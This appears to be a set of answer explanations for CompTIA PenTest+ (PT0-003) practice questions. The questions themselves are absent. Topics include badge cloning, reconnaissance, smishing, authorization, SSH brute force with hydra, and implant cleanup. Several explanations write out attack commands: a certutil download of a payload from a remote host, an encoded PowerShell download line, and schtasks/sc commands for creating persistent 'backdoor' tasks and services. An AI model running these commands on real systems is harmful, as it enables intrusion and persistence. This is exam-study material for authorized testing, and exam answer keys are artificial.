Free Practice Questions for CompTIA PT0-003 Exam

Badge cloning typically involves copying the data from access control badges, which frequently utilize the following technologies:

NFC (Near-Field Communication):

NFC is a subset of RFID technology that operates at short ranges (up to 10 cm). It is commonly used in modern access control systems, payment systems, and badge technologies. NFC cloning tools can intercept and copy badge data.

RFID (Radio-Frequency Identification):

RFID operates over a broader range of frequencies and distances than NFC. Many legacy access systems use RFID badges, which are susceptible to cloning attacks using RFID readers and cloning devices.

Exclusions:

Bluetooth, Modbus, Zigbee, CAN bus are not typically used in badge-based access control systems and are unrelated to badge cloning.

CompTIA Pentest+ References:

Domain 3.0 (Attacks and Exploits)

Domain 4.0 (Penetration Testing Tools)

To execute a payload and gain additional access, the penetration tester should use certutil.exe. Here’s why:

Using certutil.exe:

Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads.

Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.

Comparison with Other Commands:

powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ") (C): Incorrect syntax for downloading and executing a script.

rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.

Using certutil.exe to download and execute a payload is a common and effective method.

======

Comprehensive and Detailed Explanation:

Before any penetration testing begins — especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms — a formal written authorization from the customer (client organization) is mandatory.

This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.

Why not the others:

B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.

C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s not mandatory.

D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.

CompTIA PT0-003 Objective Mapping:

Domain 1.0: Planning and Scoping

1.2: Explain legal concepts, authorization requirements, and rules of engagement prior to testing.

When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here's why:

Understanding Smishing:

Smishing (SMS phishing) involves sending fraudulent messages via SMS to trick individuals into revealing personal information or performing actions that compromise security. Since the tester has access to phone numbers, this method is directly applicable.

Why Smishing is Effective:

Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding.

Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important.

Alternative Attack Techniques:

Impersonation: While effective, it generally requires real-time interaction and may not scale well across many targets.

Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.

Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it is more specific and may not be suitable for the broader set of employees in the directory.

======

The Wayback Machine is an online tool that archives web pages over time, allowing users to see how a website looked at various points in its history. This can be extremely useful for penetration testers looking to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Accessing the Wayback Machine:

Go to the Wayback Machine website: archive.org/web.

Enter the URL of the target website you want to explore.

Navigating Archived Pages:

The Wayback Machine provides a timeline and calendar interface to browse through different snapshots taken over time.

Select a snapshot to view the archived version of the site. Look for links, subdomains, and resources that may no longer be available in the current version of the website.

Identifying Subdomains:

Examine the archived pages for references to subdomains, which might be visible in links, scripts, or embedded content.

Use the information gathered to identify potential entry points or older versions of web applications that might still be exploitable.

Tool Integration:

Tools like Burp Suite or SpiderFoot can integrate with the Wayback Machine to automate the discovery process of archived subdomains and resources.

Real-World Example:

During a penetration test, a tester might find references to oldadmin.targetsite.com in an archived page from several years ago. This subdomain might no longer be listed in DNS but could still be accessible, leading to potential security vulnerabilities.

References from Pentesting Literature:

In various penetration testing guides and HTB write-ups, using the Wayback Machine is a common technique for passive reconnaissance, providing historical context and revealing past configurations that might still be exploitable.

Step-by-Step ExplanationReferences:

HTB Official Writeups

======

To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.

schtasks.exe:

Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.

Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.

Example:

schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc daily /ru SYSTEM

sc.exe:

Purpose: Service Control Manager command-line tool used to manage Windows services.

Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.

Example:

sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto

Other Utilities:

rundll.exe: Used to run DLLs as applications, not typically used for persistence.

cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.

chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.

netsh.exe: Used for network configuration, not typically used for persistence.

Pentest References:

Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.

Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.

By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.

======

Comprehensive and Detailed Explanation:

The environment contains no Windows hosts (so Windows-specific credential-capture tools like Responder are ineffective). The tester needs credentials on non-Windows servers (likely SSH). The SOC only monitors endpoints (not servers), meaning aggressive credential guessing against servers may go unnoticed. hydra is a parallelized remote-auth brute-force tool that targets services such as SSH and can iterate a username list (-L) and password list (-P) across multiple targets (-M). This makes option D the most direct tool to attempt credential discovery on non-Windows hosts (SSH brute-force).

Why not the others:

A: pwinspector is Windows-focused/unknown in this context.

B: responder targets LLMNR/NetBIOS broadcasts on Windows networks — not applicable.

C: nmap will enumerate services (helpful), but it does not obtain credentials.

PT0-003 mapping: Domain 3 — post-compromise credential discovery and use of appropriate tools given OS/service mix.

To ensure that reverse shell payloads are no longer running, it is essential to actively terminate any implanted malware or scripts. Here’s why option A is correct:

Run Scripts to Terminate the Implant: This ensures that any reverse shell payloads or malicious implants are actively terminated on the affected hosts. It is a direct and effective method to clean up after a penetration test.

Spin Down the C2 Listeners: This stops the command and control listeners but does not remove the implants from the hosts.

Restore the Firewall Settings: This is important for network security but does not directly address the termination of active implants.

Exit from C2 Listener Active Sessions: This closes the current sessions but does not ensure that implants are terminated.

References from Pentest:

Anubis HTB: Demonstrates the process of cleaning up and ensuring that all implants are removed after an assessment​​.

Forge HTB: Highlights the importance of thoroughly cleaning up and terminating any payloads or implants to leave the environment secure post-assessment​​.

======